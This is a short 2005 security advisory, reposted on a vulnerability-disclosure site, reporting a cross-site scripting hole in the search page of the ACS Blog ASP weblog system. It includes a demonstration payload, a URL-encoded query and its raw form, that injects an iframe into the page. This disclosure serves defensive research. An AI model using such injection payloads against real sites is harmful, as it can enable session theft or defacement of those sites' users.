Computer Security

Security Advisory: XSS in ACS blog
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  PHP, ASP, CGI web applications security vulnerabilities

  [PersianHacker.NET 200503-10]PHP-Fusion v5.01 Html Injection    Vulnerability

  Ciamos Highlight.php Security Hole(IHS)

  Ciamos Installation path(IHS)

  phpMyFamily 1.4.0 SQL vulnerabilities

From:farhad koosha <farhadkey_(at)_yahoo.com>
Date:18.03.2005
Subject:XSS in ACS blog



XSS vulnerability exist in the ACS blog ( ASP WEBLOG SYSTEM ).

Vulnerable :

ACS Blog v 0.8
ACS Blog v 0.9
ACS Blog v 1.0
ACS Blog v 1.1b

Code :

/search.
asp?search=%22%3Cbr%3E%3Ciframe+src%3D%22http%3A%
2F%2Fgoogle.com%22%3E%3C%2Fiframe%3E

or goto /search.asp and copy this code :
"<br><iframe src="http://google.com"></iframe>

Vendor URL : http://www.asppress.com

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru